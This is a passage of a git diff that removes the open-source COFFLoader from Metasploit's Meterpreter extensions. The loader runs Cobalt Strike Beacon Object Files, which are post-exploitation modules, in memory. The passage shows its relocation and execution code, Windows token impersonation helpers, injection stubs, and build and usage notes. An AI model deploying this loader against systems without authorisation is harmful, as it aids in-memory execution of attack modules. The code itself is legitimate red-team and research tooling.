- offsetvalue += (sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] - (sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)); - DEBUG_PRINT("\t\tRelative address: 0x%X\n", offsetvalue); - memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue, sizeof(uint32_t)); - #pragma warning(pop) - } - else - { - DEBUG_PRINT("No code for relocation type: %d\n", coff_reloc_ptr->Type); - } -#else - /* This is Type == IMAGE_REL_I386_DIR32 relocation code */ - memcpy(&offsetvalue, sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, sizeof(int32_t)); - DEBUG_PRINT("\tReadin OffsetValue : 0x%0X\n", offsetvalue); - offsetvalue = (uint32_t)(sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1]) + offsetvalue; - memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue, sizeof(uint32_t)); -#endif // WIN64 statement close -#endif // WIN32 statement close - } - else - { - symptr = coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].first.value[1]; - DEBUG_PRINT("\tSymPtr: 0x%X\n", symptr); - DEBUG_PRINT("\tSymVal: %s\n", ((char *)(coff_sym_ptr + coff_header_ptr->NumberOfSymbols)) + symptr); - DEBUG_PRINT("\tSectionNumber: 0x%X\n", coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber); - - /* This is the code to handle functions themselves, so using a makeshift Global Offset Table for it */ -#ifdef _WIN32 - funcptrlocation = process_symbol(((char *)(coff_sym_ptr + coff_header_ptr->NumberOfSymbols)) + symptr); - if (funcptrlocation == NULL) - { - DEBUG_PRINT("Failed to resolve symbol\n"); - retcode = 1; - goto cleanup; - } -#ifdef _WIN64 - if (coff_reloc_ptr->Type == IMAGE_REL_AMD64_REL32 && funcptrlocation != NULL) - { - /* This is Type == 4 relocation code */ - DEBUG_PRINT("Doing function relocation\n"); - if (((functionMapping + (functionMappingCount * 8)) - (sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)) > 0xffffffff) - { - DEBUG_PRINT("Relocations > 4 gigs away, exiting\n"); - retcode = 1; - goto cleanup; - } - memcpy(functionMapping + (functionMappingCount * 8), &funcptrlocation, sizeof(uint64_t)); - offsetvalue = (int32_t)((functionMapping + (functionMappingCount * 8)) - (sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)); - DEBUG_PRINT("\t\tRelative address : 0x%x\n", offsetvalue); - memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue, sizeof(uint32_t)); - functionMappingCount++; - } - else if (coff_reloc_ptr->Type == IMAGE_REL_AMD64_REL32) - { - /* This shouldn't be needed here, but incase there's a defined symbol - * that somehow doesn't have a function, try to resolve it here.*/ - memcpy(&offsetvalue, sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, sizeof(int32_t)); - if ((sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] - (sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)) > 0xffffffff) - { - DEBUG_PRINT("Relocations > 4 gigs away, exiting\n"); - retcode = 1; - goto cleanup; - } - DEBUG_PRINT("\t\tReadin offset value: 0x%X\n", offsetvalue); - #pragma warning(push) - #pragma warning(disable:4244) - offsetvalue += (sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] - (sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)); - #pragma warning(pop) - DEBUG_PRINT("\t\tRelative address: 0x%X\n", offsetvalue); - memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue, sizeof(uint32_t)); - } - else - { - DEBUG_PRINT("No code for relocation type: %d\n", coff_reloc_ptr->Type); - } -#else - /* This is Type == IMAGE_REL_I386_DIR32 relocation code */ - memcpy(functionMapping + (functionMappingCount * 4), &funcptrlocation, sizeof(uint32_t)); - offsetvalue = (int32_t)(functionMapping + (functionMappingCount * 4)); - memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue, sizeof(uint32_t)); - functionMappingCount++; -#endif -#endif - } - DEBUG_PRINT("\tValueNumber: 0x%X\n", coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].Value); - DEBUG_PRINT("\tSectionNumber: 0x%X\n", coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber); - coff_reloc_ptr = (coff_reloc_t *)(((char *)coff_reloc_ptr) + sizeof(coff_reloc_t)); - DEBUG_PRINT("\n"); - } - DEBUG_PRINT("\n"); - } - - /* Some debugging code to see what the sections look like in memory */ -#if DEBUG -#ifdef _WIN32 - for (tempcounter = 0; tempcounter < 10; tempcounter++) - { - DEBUG_PRINT("Section: %d\n", tempcounter); - if (sectionMapping[tempcounter] != NULL) - { - DEBUG_PRINT("\t"); - for (counter = 0; counter < sectionSize[tempcounter]; counter++) - { - DEBUG_PRINT("%02X ", (uint8_t)(sectionMapping[tempcounter][counter])); - } - DEBUG_PRINT("\n"); - } - } -#endif -#endif - // Apply proper page permissions - for (counter = 0; counter < coff_header_ptr->NumberOfSections; counter++) - { - coff_sect_ptr = (coff_sect_t *)(coff_data + sizeof(coff_file_header_t) + (sizeof(coff_sect_t) * counter)); - if (coff_sect_ptr->SizeOfRawData > 0) - { - protect_index = coff_sect_ptr->Characteristics >> 29; - protect = ProtectionFlags[protect_index]; - DEBUG_PRINT("New page prot flag: 0x%08x\n", protect); - if ((coff_sect_ptr->Characteristics & IMAGE_SCN_MEM_NOT_CACHED) != 0) - { - protect |= PAGE_NOCACHE; - } - if (VirtualProtect(sectionMapping[counter], coff_sect_ptr->SizeOfRawData, protect, &old_prot) == 0) - { -#if DEBUG - DWORD error = GetLastError(); - DEBUG_PRINT("Could not change page protection: %08x\n", error); -#endif - return 1; - } - } - } - - if (VirtualProtect(functionMapping, 2048, PAGE_EXECUTE_READ, &old_prot) == 0) - { -#if DEBUG - DWORD error = GetLastError(); - DEBUG_PRINT("Could not change page protection on functionMapping: %08x\n", error); -#endif - return 1; - } - #pragma warning(disable:4018) - - DEBUG_PRINT("Symbols:\n"); - for (tempcounter = 0; tempcounter < coff_header_ptr->NumberOfSymbols; tempcounter++) - { - DEBUG_PRINT("\t%s: Section: %d, Value: 0x%X\n", coff_sym_ptr[tempcounter].first.Name, coff_sym_ptr[tempcounter].SectionNumber, coff_sym_ptr[tempcounter].Value); - if (strcmp(coff_sym_ptr[tempcounter].first.Name, entryfuncname) == 0) - { - DEBUG_PRINT("\t\tFound entry!\n"); -#ifdef _WIN32 - /* So for some reason VS 2017 doesn't like this, but char* casting works, so just going to do that */ -#ifdef _MSC_VER - #pragma warning(disable:4047) - foo = (char *)(sectionMapping[coff_sym_ptr[tempcounter].SectionNumber - 1] + coff_sym_ptr[tempcounter].Value); -#else - foo = (void (*)(char *, unsigned long))(sectionMapping[coff_sym_ptr[tempcounter].SectionNumber - 1] + coff_sym_ptr[tempcounter].Value); -#endif - // sectionMapping[coff_sym_ptr[tempcounter].SectionNumber-1][coff_sym_ptr[tempcounter].Value+7] = '\xcc'; - DEBUG_PRINT("Trying to run: %p\n", foo); - foo((char *)argumentdata, argumentSize); -#endif - } - } - DEBUG_PRINT("Back\n"); - - /* Cleanup the allocated memory */ -#ifdef _WIN32 - if (callback != NULL) - { - outdata = BeaconGetOutputData(&outdataSize); - if (outdata != NULL) - { - DEBUG_PRINT("[COFFLoader] Calling Go callback at %p\n", callback); - (*callback)(outdata, outdataSize); - } - } -cleanup: - for (tempcounter = 0; tempcounter < 25; tempcounter++) - { - if (sectionMapping[tempcounter]) - { - VirtualFree(sectionMapping[tempcounter], 0, MEM_RELEASE); - } - } - VirtualFree(functionMapping, 0, MEM_RELEASE); -#endif - DEBUG_PRINT("Returning\n"); - return retcode; -} - -#ifdef COFF_STANDALONE -int main(int argc, char *argv[]) -{ - char *coff_data = NULL; - unsigned char *arguments = NULL; - int argumentSize = 0; -#ifdef _WIN32 - char *outdata = NULL; - int outdataSize = 0; -#endif - uint32_t filesize = 0; - int checkcode = 0; - if (argc < 3) - { - printf("ERROR: %s go /path/to/object/file.o (arguments)\n", argv[0]); - return 1; - } - - coff_data = (char *)getContents(argv[2], &filesize); - if (coff_data == NULL) - { - printf("ERROR: empty bof file\n"); - return 1; - } - printf("Got contents of COFF file\n"); - arguments = unhexlify((unsigned char *)argv[3], &argumentSize); - printf("Running/Parsing the COFF file\n"); - checkcode = RunCOFF(argv[1], (unsigned char *)coff_data, filesize, arguments, argumentSize, NULL); - if (checkcode == 0) - { -#ifdef _WIN32 - printf("Ran/parsed the coff\n"); - outdata = BeaconGetOutputData(&outdataSize); - if (outdata != NULL) - { - - printf("Outdata Below:\n\n%s\n", outdata); - } -#endif - } - else - { - printf("Failed to run/parse the COFF file\n"); - } - if (coff_data) - { - free(coff_data); - } - return 0; -} - -#endif diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.h b/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.h deleted file mode 100644 index 3deb8240..00000000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.h +++ /dev/null @@ -1,135 +0,0 @@ -#ifndef COFFLOADER_H_ -#define COFFLOADER_H_ -#include -#include -#include - -/* These seem to be the same sizes across architectures, relocations are different though. Defined both sets of types. */ - -/* sizeof 20 */ -typedef struct coff_file_header -{ - uint16_t Machine; - uint16_t NumberOfSections; - uint32_t TimeDateStamp; - uint32_t PointerToSymbolTable; - uint32_t NumberOfSymbols; - uint16_t SizeOfOptionalHeader; - uint16_t Characteristics; -} coff_file_header_t; - -/* AMD64 should always be here */ -#define MACHINETYPE_AMD64 0x8664 - -#pragma pack(push, 1) - -/* Size of 40 */ -typedef struct coff_sect -{ - char Name[8]; - uint32_t VirtualSize; - uint32_t VirtualAddress; - uint32_t SizeOfRawData; - uint32_t PointerToRawData; - uint32_t PointerToRelocations; - uint32_t PointerToLineNumbers; - uint16_t NumberOfRelocations; - uint16_t NumberOfLinenumbers; - uint32_t Characteristics; -} coff_sect_t; - -typedef struct coff_reloc -{ - uint32_t VirtualAddress; - uint32_t SymbolTableIndex; - uint16_t Type; -} coff_reloc_t; - -typedef struct coff_sym -{ - union - { - char Name[8]; - uint32_t value[2]; - } first; - uint32_t Value; - uint16_t SectionNumber; - uint16_t Type; - uint8_t StorageClass; - uint8_t NumberOfAuxSymbols; - -} coff_sym_t; - -uint32_t ProtectionFlags[8] = { - PAGE_NOACCESS, // not writeable, not readable, not executable - PAGE_EXECUTE, // not writeable, not readable, executable - PAGE_READONLY, // not writeable, readable, not executable - PAGE_EXECUTE_READ, // not writeable, readable, executable - PAGE_WRITECOPY, // writeable, not readable, not executable - PAGE_EXECUTE_WRITECOPY, // writeable, not readable, executable - PAGE_READWRITE, // writeable, readable, not executable - PAGE_EXECUTE_READWRITE, // writeable, readable, executable -}; - -#pragma pack(pop) -/* AMD64 Specific types */ -#define IMAGE_REL_AMD64_ABSOLUTE 0x0000 -#define IMAGE_REL_AMD64_ADDR64 0x0001 -#define IMAGE_REL_AMD64_ADDR32 0x0002 -#define IMAGE_REL_AMD64_ADDR32NB 0x0003 -/* Most common from the looks of it, just 32-bit relative address from the byte following the relocation */ -#define IMAGE_REL_AMD64_REL32 0x0004 -/* Second most common, 32-bit address without an image base. Not sure what that means... */ -#define IMAGE_REL_AMD64_REL32_1 0x0005 -#define IMAGE_REL_AMD64_REL32_2 0x0006 -#define IMAGE_REL_AMD64_REL32_3 0x0007 -#define IMAGE_REL_AMD64_REL32_4 0x0008 -#define IMAGE_REL_AMD64_REL32_5 0x0009 -#define IMAGE_REL_AMD64_SECTION 0x000A -#define IMAGE_REL_AMD64_SECREL 0x000B -#define IMAGE_REL_AMD64_SECREL7 0x000C -#define IMAGE_REL_AMD64_TOKEN 0x000D -#define IMAGE_REL_AMD64_SREL32 0x000E -#define IMAGE_REL_AMD64_PAIR 0x000F -#define IMAGE_REL_AMD64_SSPAN32 0x0010 - -/*i386 Relocation types */ - -#define IMAGE_REL_I386_ABSOLUTE 0x0000 -#define IMAGE_REL_I386_DIR16 0x0001 -#define IMAGE_REL_I386_REL16 0x0002 -#define IMAGE_REL_I386_DIR32 0x0006 -#define IMAGE_REL_I386_DIR32NB 0x0007 -#define IMAGE_REL_I386_SEG12 0x0009 -#define IMAGE_REL_I386_SECTION 0x000A -#define IMAGE_REL_I386_SECREL 0x000B -#define IMAGE_REL_I386_TOKEN 0x000C -#define IMAGE_REL_I386_SECREL7 0x000D -#define IMAGE_REL_I386_REL32 0x0014 - -/* Section Characteristic Flags */ - -#define IMAGE_SCN_MEM_WRITE 0x80000000 -#define IMAGE_SCN_MEM_READ 0x40000000 -#define IMAGE_SCN_MEM_EXECUTE 0x20000000 -#define IMAGE_SCN_ALIGN_16BYTES 0x00500000 -#define IMAGE_SCN_MEM_NOT_CACHED 0x04000000 -#define IMAGE_SCN_MEM_NOT_PAGED 0x08000000 -#define IMAGE_SCN_MEM_SHARED 0x10000000 -#define IMAGE_SCN_CNT_CODE 0x00000020 -#define IMAGE_SCN_CNT_UNINITIALIZED_DATA 0x00000080 -#define IMAGE_SCN_MEM_DISCARDABLE 0x02000000 - -unsigned char *unhexlify(unsigned char *value, int *outlen); -typedef int (*goCallback)(char *, int); -#ifdef BUILD_DLL -/* DLL export */ -#define EXPORT __declspec(dllexport) -EXPORT int __cdecl LoadAndRun(char *argsBuffer, uint32_t bufferSize, goCallback callback); -#else -/* EXE import */ -#define EXPORT __declspec(dllimport) -#endif - -int RunCOFF(char *functionname, unsigned char *coff_data, uint32_t filesize, unsigned char *argumentdata, int argumentSize, goCallback data); -#endif diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/LICENSE.txt b/c/meterpreter/source/extensions/bofloader/COFFLoader/LICENSE.txt deleted file mode 100644 index be683b36..00000000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/LICENSE.txt +++ /dev/null @@ -1,25 +0,0 @@ -Copyright 2020, COFFLoader by TrustedSec, LLC -All rights reserved. - -Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: - - * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer - in the documentation and/or other materials provided with the distribution. - * Neither the name of TrustedSec, LLC nor the names of its contributors may be used to endorse or promote products derived from - this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF -THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -The above licensing was taken from the BSD licensing and is applied to COFFLoader as well. - -Note that the COFFLoader is provided as is, and is a royalty free open-source application. - -Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit -is due (which means giving the authors the credit they deserve for writing it). - diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/Makefile b/c/meterpreter/source/extensions/bofloader/COFFLoader/Makefile deleted file mode 100644 index 0f78d06e..00000000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/Makefile +++ /dev/null @@ -1,36 +0,0 @@ - -all: bof bof32 -all-dll: dll dll32 -debug: debug32 debug64 - -dll: - x86_64-w64-mingw32-gcc -shared -Wall -DBUILD_DLL dll.c beacon_compatibility.c COFFLoader.c -o COFFLoader.x64.dll - x86_64-w64-mingw32-gcc -c test.c -o test64.out - -dll32: - i686-w64-mingw32-gcc -shared -Wall -DBUILD_DLL dll.c beacon_compatibility.c COFFLoader.c -o COFFLoader.x86.dll - i686-w64-mingw32-gcc -c test.c -o test32.out - -bof: - x86_64-w64-mingw32-gcc -Wall -DCOFF_STANDALONE beacon_compatibility.c COFFLoader.c -o COFFLoader64.exe - x86_64-w64-mingw32-gcc -c test.c -o test64.out - -bof32: - i686-w64-mingw32-gcc -Wall -DCOFF_STANDALONE beacon_compatibility.c COFFLoader.c -o COFFLoader32.exe - i686-w64-mingw32-gcc -c test.c -o test32.out - -debug64: - x86_64-w64-mingw32-gcc -DCOFF_STANDALONE -DDEBUG beacon_compatibility.c COFFLoader.c -o COFFLoader64.exe - x86_64-w64-mingw32-gcc -c test.c -o test64.out - -debug32: - i686-w64-mingw32-gcc -DCOFF_STANDALONE -DDEBUG beacon_compatibility.c COFFLoader.c -o COFFLoader32.exe - i686-w64-mingw32-gcc -c test.c -o test32.out - -nix: - gcc -DCOFF_STANDALONE -Wall -DDEBUG beacon_compatibility.c COFFLoader.c -o COFFLoader.out - -clean: - rm -f COFFLoader64.exe COFFLoader32.exe COFFLoader.out - rm -f test32.out test64.out - rm -f *.dll diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/README.md b/c/meterpreter/source/extensions/bofloader/COFFLoader/README.md deleted file mode 100644 index 49c34eaa..00000000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/README.md +++ /dev/null @@ -1,47 +0,0 @@ -# COFF Loader - -This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it. The only exception is that the injection related beacon compatibility functions are just empty. - -The main goal is to provide a working example and maybe be useful to someone. - - -## Parts -There are a few parts to it they are listed below. - -- beacon_compatibility: This is the beacon internal functions so that you can load BOF files and run them. -- COFFLoader: This is the actual coff loader, and when built for nix just loads the 64 bit object file and parses it. -- test: This is the example "COFF" file, will build to the COFF file for you when make is called. -- beacon_generate: This is a helper script to build strings/arguments compatible with the beacon_compatibility functions. - - -## Beacon Generate -This is used to generate arguments for the COFFLoader code, if the BOF takes arguments simply add the arguments with the type expected with this and generate the hex string for use. - -Example usage here: -``` -COFFLoader % python3 beacon_generate.py -Beacon Argument Generator -Beacon>help - -Documented commands (type help ): -======================================== -addString addWString addint addshort exit generate help reset - -Beacon>addWString test -Beacon>addint 4 -Beacon>generate -b'120000000a0000007400650073007400000004000000' -Beacon>reset -Beacon>addint 5 -Beacon>generate -b'0400000005000000' -Beacon>exit -``` - -## Running -An example of how to run a BOF is below. - -``` -COFFLoader64.exe go test64.out -COFFLoader64.exe go ..\CS-Situational-Awareness-BOF\SA\whoami\whoami.x64.o -``` diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon.h b/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon.h deleted file mode 100644 index 36131597..00000000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon.h +++ /dev/null @@ -1,61 +0,0 @@ -/* - * Beacon Object Files (BOF) - * ------------------------- - * A Beacon Object File is a light-weight post exploitation tool that runs - * with Beacon's inline-execute command. - * - * Cobalt Strike 4.1. - */ - -/* data API */ -typedef struct { - char * original; /* the original buffer [so we can free it] */ - char * buffer; /* current pointer into our buffer */ - int length; /* remaining length of data */ - int size; /* total size of this buffer */ -} datap; - -DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); -DECLSPEC_IMPORT int BeaconDataInt(datap * parser); -DECLSPEC_IMPORT short BeaconDataShort(datap * parser); -DECLSPEC_IMPORT int BeaconDataLength(datap * parser); -DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); - -/* format API */ -typedef struct { - char * original; /* the original buffer [so we can free it] */ - char * buffer; /* current pointer into our buffer */ - int length; /* remaining length of data */ - int size; /* total size of this buffer */ -} formatp; - -DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); -DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); -DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); -DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); -DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); -DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); -DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); - -/* Output Functions */ -#define CALLBACK_OUTPUT 0x0 -#define CALLBACK_OUTPUT_OEM 0x1e -#define CALLBACK_ERROR 0x0d -#define CALLBACK_OUTPUT_UTF8 0x20 - -DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); -DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); - -/* Token Functions */ -DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); -DECLSPEC_IMPORT void BeaconRevertToken(); -DECLSPEC_IMPORT BOOL BeaconIsAdmin(); - -/* Spawn+Inject Functions */ -DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); -DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); -DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); -DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); - -/* Utility Functions */ -DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.c b/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.c deleted file mode 100644 index 728d8044..00000000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.c +++ /dev/null @@ -1,355 +0,0 @@ -/* - * Cobalt Strike 4.X BOF compatibility layer - * ----------------------------------------- - * The whole point of these files are to allow beacon object files built for CS - * to run fine inside of other tools without recompiling. - * - * Built off of the beacon.h file provided to build for CS. - */ -#include -#include -#include -#include -#ifdef _WIN32 -#include - -#include "beacon_compatibility.h" - -#define DEFAULTPROCESSNAME "rundll32.exe" -#ifdef _WIN64 -#define X86PATH "SysWOW64" -#define X64PATH "System32" -#else -#define X86PATH "System32" -#define X64PATH "sysnative" -#endif - - - /* Data Parsing */ -unsigned char* InternalFunctions[29][2] = { - {(unsigned char*)"BeaconDataParse", (unsigned char*)BeaconDataParse}, - {(unsigned char*)"BeaconDataInt", (unsigned char*)BeaconDataInt}, - {(unsigned char*)"BeaconDataShort", (unsigned char*)BeaconDataShort}, - {(unsigned char*)"BeaconDataLength", (unsigned char*)BeaconDataLength}, - {(unsigned char*)"BeaconDataExtract", (unsigned char*)BeaconDataExtract}, - {(unsigned char*)"BeaconFormatAlloc", (unsigned char*)BeaconFormatAlloc}, - {(unsigned char*)"BeaconFormatReset", (unsigned char*)BeaconFormatReset}, - {(unsigned char*)"BeaconFormatFree", (unsigned char*)BeaconFormatFree}, - {(unsigned char*)"BeaconFormatAppend", (unsigned char*)BeaconFormatAppend}, - {(unsigned char*)"BeaconFormatPrintf", (unsigned char*)BeaconFormatPrintf}, - {(unsigned char*)"BeaconFormatToString", (unsigned char*)BeaconFormatToString}, - {(unsigned char*)"BeaconFormatInt", (unsigned char*)BeaconFormatInt}, - {(unsigned char*)"BeaconPrintf", (unsigned char*)BeaconPrintf}, - {(unsigned char*)"BeaconOutput", (unsigned char*)BeaconOutput}, - {(unsigned char*)"BeaconUseToken", (unsigned char*)BeaconUseToken}, - {(unsigned char*)"BeaconRevertToken", (unsigned char*)BeaconRevertToken}, - {(unsigned char*)"BeaconIsAdmin", (unsigned char*)BeaconIsAdmin}, - {(unsigned char*)"BeaconGetSpawnTo", (unsigned char*)BeaconGetSpawnTo}, - {(unsigned char*)"BeaconSpawnTemporaryProcess", (unsigned char*)BeaconSpawnTemporaryProcess}, - {(unsigned char*)"BeaconInjectProcess", (unsigned char*)BeaconInjectProcess}, - {(unsigned char*)"BeaconInjectTemporaryProcess", (unsigned char*)BeaconInjectTemporaryProcess}, - {(unsigned char*)"BeaconCleanupProcess", (unsigned char*)BeaconCleanupProcess}, - {(unsigned char*)"toWideChar", (unsigned char*)toWideChar}, - {(unsigned char*)"LoadLibraryA", (unsigned char*)LoadLibraryA}, - {(unsigned char*)"GetProcAddress", (unsigned char*)GetProcAddress}, - {(unsigned char*)"GetModuleHandleA", (unsigned char*)GetModuleHandleA}, - {(unsigned char*)"FreeLibrary", (unsigned char*)FreeLibrary} -}; - -uint32_t swap_endianess(uint32_t indata) { - uint32_t testint = 0xaabbccdd; - uint32_t outint = indata; - if (((unsigned char*)&testint)[0] == 0xdd) { - ((unsigned char*)&outint)[0] = ((unsigned char*)&indata)[3]; - ((unsigned char*)&outint)[1] = ((unsigned char*)&indata)[2]; - ((unsigned char*)&outint)[2] = ((unsigned char*)&indata)[1]; - ((unsigned char*)&outint)[3] = ((unsigned char*)&indata)[0]; - } - return outint; -} - -char* beacon_compatibility_output = NULL; -int beacon_compatibility_size = 0; -int beacon_compatibility_offset = 0; - -void BeaconDataParse(datap* parser, char* buffer, int size) { - if (parser == NULL) { - return; - } - parser->original = buffer; - parser->buffer = buffer; - parser->length = size - 4; - parser->size = size - 4; - parser->buffer += 4; - return; -} - -int BeaconDataInt(datap* parser) { - int32_t fourbyteint = 0; - if (parser->length < 4) { - return 0; - } - memcpy(&fourbyteint, parser->buffer, 4); - parser->buffer += 4; - parser->length -= 4; - return (int)fourbyteint; -} - -short BeaconDataShort(datap* parser) { - int16_t retvalue = 0; - if (parser->length < 2) { - return 0; - } - memcpy(&retvalue, parser->buffer, 2); - parser->buffer += 2; - parser->length -= 2; - return (short)retvalue; -} - -int BeaconDataLength(datap* parser) { - return parser->length; -} - -char* BeaconDataExtract(datap* parser, int* size) { - uint32_t length = 0; - char* outdata = NULL; - /*Length prefixed binary blob, going to assume uint32_t for this.*/ - if (parser->length < 4) { - return NULL; - } - memcpy(&length, parser->buffer, 4); - parser->buffer += 4; - - outdata = parser->buffer; - if (outdata == NULL) { - return NULL; - } - parser->length -= 4; - parser->length -= length; - parser->buffer += length; - if (size != NULL && outdata != NULL) { - *size = length; - } - return outdata; -} - -/* format API */ - -void BeaconFormatAlloc(formatp* format, int maxsz) { - if (format == NULL) { - return; - } - format->original = calloc(maxsz, 1); - format->buffer = format->original; - format->length = 0; - format->size = maxsz; - return; -} - -void BeaconFormatReset(formatp* format) { - memset(format->original, 0, format->size); - format->buffer = format->original; - format->length = format->size; - return; -} - -void BeaconFormatFree(formatp* format) { - if (format == NULL) { - return; - } - if (format->original) { - free(format->original); - format->original = NULL; - } - format->buffer = NULL; - format->length = 0; - format->size = 0; - return; -} - -void BeaconFormatAppend(formatp* format, char* text, int len) { - memcpy(format->buffer, text, len); - format->buffer += len; - format->length += len; - return; -} - -void BeaconFormatPrintf(formatp* format, char* fmt, ...) { - /*Take format string, and sprintf it into here*/ - va_list args; - int length = 0; - - va_start(args, fmt); - length = vsnprintf(NULL, 0, fmt, args); - va_end(args); - if (format->length + length > format->size) { - return; - } - - va_start(args, fmt); - (void)vsnprintf(format->buffer, length, fmt, args); - va_end(args); - format->length += length; - format->buffer += length; - return; -} - - -char* BeaconFormatToString(formatp* format, int* size) { - *size = format->length; - return format->original; -} - -void BeaconFormatInt(formatp* format, int value) { - uint32_t indata = value; - uint32_t outdata = 0; - if (format->length + 4 > format->size) { - return; - } - outdata = swap_endianess(indata); - memcpy(format->buffer, &outdata, 4); - format->length += 4; - format->buffer += 4; - return; -} - -/* Main output functions */ - -void BeaconPrintf(int type, char* fmt, ...) { - /* Change to maintain internal buffer, and return after done running. */ - int length = 0; - char* tempptr = NULL; - va_list args; - va_start(args, fmt); - vprintf(fmt, args); - va_end(args); - - va_start(args, fmt); - length = vsnprintf(NULL, 0, fmt, args); - va_end(args); - tempptr = realloc(beacon_compatibility_output, beacon_compatibility_size + length + 1); - if (tempptr == NULL) { - return; - } - beacon_compatibility_output = tempptr; - memset(beacon_compatibility_output + beacon_compatibility_offset, 0, length + 1); - va_start(args, fmt); - length = vsnprintf(beacon_compatibility_output + beacon_compatibility_offset, length +1, fmt, args); - beacon_compatibility_size += length; - beacon_compatibility_offset += length; - va_end(args); - return; -} - -void BeaconOutput(int type, char* data, int len) { - char* tempptr = NULL; - tempptr = realloc(beacon_compatibility_output, beacon_compatibility_size + len + 1); - beacon_compatibility_output = tempptr; - if (tempptr == NULL) { - return; - } - memset(beacon_compatibility_output + beacon_compatibility_offset, 0, len + 1); - memcpy(beacon_compatibility_output + beacon_compatibility_offset, data, len); - beacon_compatibility_size += len; - beacon_compatibility_offset += len; - return; -} - -/* Token Functions */ - -BOOL BeaconUseToken(HANDLE token) { - /* Probably needs to handle DuplicateTokenEx too */ - SetThreadToken(NULL, token); - return TRUE; -} - -void BeaconRevertToken(void) { - if (!RevertToSelf()) { -#ifdef DEBUG - printf("RevertToSelf Failed!\n"); -#endif - } - return; -} - -BOOL BeaconIsAdmin(void) { - /* Leaving this to be implemented by people needing it */ -#ifdef DEBUG - printf("BeaconIsAdmin Called\n"); -#endif - return FALSE; -} - -/* Injection/spawning related stuffs - * - * These functions are basic place holders, and if implemented into something - * real should be just calling internal functions for your tools. */ -void BeaconGetSpawnTo(BOOL 